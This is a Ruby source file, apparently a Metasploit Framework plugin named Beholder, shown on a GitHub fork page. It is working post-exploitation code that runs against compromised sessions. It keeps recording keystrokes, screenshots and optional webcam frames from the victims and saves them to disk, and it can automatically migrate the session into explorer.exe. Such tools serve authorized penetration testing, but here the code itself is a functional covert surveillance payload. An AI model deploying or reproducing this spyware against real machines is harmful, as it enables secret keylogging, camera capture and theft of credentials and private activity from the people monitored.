forked from rapid7/metasploit-framework
-
Notifications
You must be signed in to change notification settings - Fork 0
/
beholder.rb
336 lines (276 loc) · 9.29 KB
/
beholder.rb
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
# -*- coding:binary -*-
require 'fileutils'
module Msf
class Plugin::Beholder < Msf::Plugin
#
# Worker Thread
#
class BeholderWorker
attr_accessor :framework, :config, :driver, :thread
attr_accessor :state
def initialize(framework, config, driver)
self.state = { }
self.framework = framework
self.config = config
self.driver = driver
self.thread = framework.threads.spawn('BeholderWorker', false) {
begin
self.start
rescue ::Exception => e
$stderr.puts "BeholderWorker: #{e.class} #{e.to_s} #{e.backtrace}"
end
# Mark this worker as dead
self.thread = nil
}
end
def stop
return unless self.thread
self.thread.kill rescue nil
self.thread = nil
end
def start
self.driver.print_status("Beholder is logging to #{self.config[:base]}")
bool_options = [ :screenshot, :webcam, :keystrokes, :automigrate ]
bool_options.each do |o|
self.config[o] = !!( self.config[o].to_s =~ /^[yt1]/i)
end
int_options = [ :idle, :freq ]
int_options.each do |o|
self.config[o] = self.config[o].to_i
end
::FileUtils.mkdir_p(self.config[:base])
loop do
framework.sessions.keys.each do |sid|
begin
if self.state[sid].nil? ||
(self.state[sid][:last_update] + self.config[:freq] < Time.now.to_f)
process(sid)
end
rescue ::Exception => e
session_log(sid, "triggered an exception: #{e.class} #{e} #{e.backtrace}")
end
end
sleep(1)
end
end
def process(sid)
self.state[sid] ||= {}
store_session_info(sid)
return unless compatible?(sid)
return if stale_session?(sid)
verify_migration(sid)
cache_sysinfo(sid)
collect_keystrokes(sid)
collect_screenshot(sid)
collect_webcam(sid)
end
def session_log(sid, msg)
::File.open(::File.join(self.config[:base], "session.log"), "a") do |fd|
fd.puts "#{Time.now.strftime('%Y-%m-%d %H:%M:%S')} Session #{sid} [#{self.state[sid][:info]}] #{msg}"
end
end
def store_session_info(sid)
self.state[sid][:last_update] = Time.now.to_f
return if self.state[sid][:initialized]
self.state[sid][:info] = framework.sessions[sid].info
session_log(sid, "registered")
self.state[sid][:initialized] = true
end
def capture_filename(sid)
self.state[sid][:name] + "_" + Time.now.strftime("%Y%m%d-%H%M%S")
end
def store_keystrokes(sid, data)
return unless data.length > 0
filename = capture_filename(sid) + "_keystrokes.txt"
::File.open(::File.join(self.config[:base], filename), "wb") {|fd| fd.write(data) }
session_log(sid, "captured keystrokes to #{filename}")
end
def store_screenshot(sid, data)
filename = capture_filename(sid) + "_screenshot.jpg"
::File.open(::File.join(self.config[:base], filename), "wb") {|fd| fd.write(data) }
session_log(sid, "captured screenshot to #{filename}")
end
def store_webcam(sid, data)
filename = capture_filename(sid) + "_webcam.jpg"
::File.open(::File.join(self.config[:base], filename), "wb") {|fd| fd.write(data) }
session_log(sid, "captured webcam snap to #{filename}")
end
# TODO: Stop the keystroke scanner when the plugin exits
def collect_keystrokes(sid)
return unless self.config[:keystrokes]
sess = framework.sessions[sid]
unless self.state[sid][:keyscan]
# Consume any error (happens if the keystroke thread is already active)
sess.ui.keyscan_start rescue nil
self.state[sid][:keyscan] = true
return
end
collected_keys = sess.ui.keyscan_dump
store_keystrokes(sid, collected_keys)
end
# TODO: Specify image quality
def collect_screenshot(sid)
return unless self.config[:screenshot]
sess = framework.sessions[sid]
collected_image = sess.ui.screenshot(50)
store_screenshot(sid, collected_image)
end
# TODO: Specify webcam index and frame quality
def collect_webcam(sid)
return unless self.config[:webcam]
sess = framework.sessions[sid]
begin
sess.webcam.webcam_start(1)
collected_image = sess.webcam.webcam_get_frame(100)
store_webcam(sid, collected_image)
ensure
sess.webcam.webcam_stop
end
end
def cache_sysinfo(sid)
return if self.state[sid][:sysinfo]
self.state[sid][:sysinfo] = framework.sessions[sid].sys.config.sysinfo
self.state[sid][:name] = "#{sid}_" + (self.state[sid][:sysinfo]['Computer'] || "Unknown").gsub(/[^A-Za-z0-9\.\_\-]/, '')
end
def verify_migration(sid)
return unless self.config[:automigrate]
return if self.state[sid][:migrated]
sess = framework.sessions[sid]
# Are we in an explorer process already?
pid = sess.sys.process.getpid
session_log(sid, "has process ID #{pid}")
ps = sess.sys.process.get_processes
this_ps = ps.select{|x| x['pid'] == pid }.first
# Already in explorer? Mark the session and move on
if this_ps && this_ps['name'].to_s.downcase == 'explorer.exe'
session_log(sid, "is already in explorer.exe")
self.state[sid][:migrated] = true
return
end
# Attempt to migrate, but flag that we tried either way
self.state[sid][:migrated] = true
# Grab the first explorer.exe process we find that we have rights to
target_ps = ps.select{|x| x['name'].to_s.downcase == 'explorer.exe' && x['user'].to_s != '' }.first
unless target_ps
# No explorer.exe process?
session_log(sid, "no explorer.exe process found for automigrate")
return
end
# Attempt to migrate to the target pid
session_log(sid, "attempting to migrate to #{target_ps.inspect}")
sess.core.migrate(target_ps['pid'])
end
# Only support sessions that have core.migrate()
def compatible?(sid)
framework.sessions[sid].respond_to?(:core) &&
framework.sessions[sid].core.respond_to?(:migrate)
end
# Skip sessions with ancient last checkin times
def stale_session?(sid)
return unless framework.sessions[sid].respond_to?(:last_checkin)
session_age = Time.now.to_i - framework.sessions[sid].last_checkin.to_i
# TODO: Make the max age configurable, for now 5 minutes seems reasonable
if session_age > 300
session_log(sid, "is a stale session, skipping, last checked in #{session_age} seconds ago")
return true
end
return
end
end
#
# Command Dispatcher
#
class BeholderCommandDispatcher
include Msf::Ui::Console::CommandDispatcher
@@beholder_config = {
screenshot: true,
webcam: false,
keystrokes: true,
automigrate: true,
base: ::File.join(Msf::Config.get_config_root, "beholder", Time.now.strftime("%Y-%m-%d.%s")),
freq: 30,
# TODO: Only capture when the idle threshold has been reached
idle: 0,
}
@@beholder_worker = nil
def name
"Beholder"
end
def commands
{
'beholder_start' => "Start capturing data",
'beholder_stop' => "Stop capturing data",
'beholder_conf' => "Configure capture parameters",
}
end
def cmd_beholder_stop(*args)
unless @@beholder_worker
print_error("Error: Beholder is not active")
return
end
print_status("Beholder is shutting down...")
stop_beholder
end
def cmd_beholder_conf(*args)
parse_config(*args)
print_status("Beholder Configuration")
print_status("----------------------")
@@beholder_config.each_pair do |k,v|
print_status(" #{k}: #{v}")
end
end
def cmd_beholder_start(*args)
opts = Rex::Parser::Arguments.new(
"-h" => [ false, "This help menu"],
)
opts.parse(args) do |opt, idx, val|
case opt
when "-h"
print_line("Usage: beholder_start [base=</path/to/directory>] [screenshot=<true|false>] [webcam=<true|false>] [keystrokes=<true|false>] [automigrate=<true|false>] [freq=30]")
print_line(opts.usage)
return
end
end
if @@beholder_worker
print_error("Error: Beholder is already active, use beholder_stop to terminate")
return
end
parse_config(*args)
start_beholder
end
def parse_config(*args)
new_config = args.map{|x| x.split("=", 2) }
new_config.each do |c|
unless @@beholder_config.has_key?(c.first.to_sym)
print_error("Invalid configuration option: #{c.first}")
next
end
@@beholder_config[c.first.to_sym] = c.last
end
end
def stop_beholder
@@beholder_worker.stop if @@beholder_worker
@@beholder_worker = nil
end
def start_beholder
@@beholder_worker = BeholderWorker.new(framework, @@beholder_config, driver)
end
end
#
# Plugin Interface
#
def initialize(framework, opts)
super
add_console_dispatcher(BeholderCommandDispatcher)
end
def cleanup
remove_console_dispatcher('Beholder')
end
def name
"beholder"
end
def desc
"Capture screenshots, webcam pictures, and keystrokes from active sessions"
end
end
end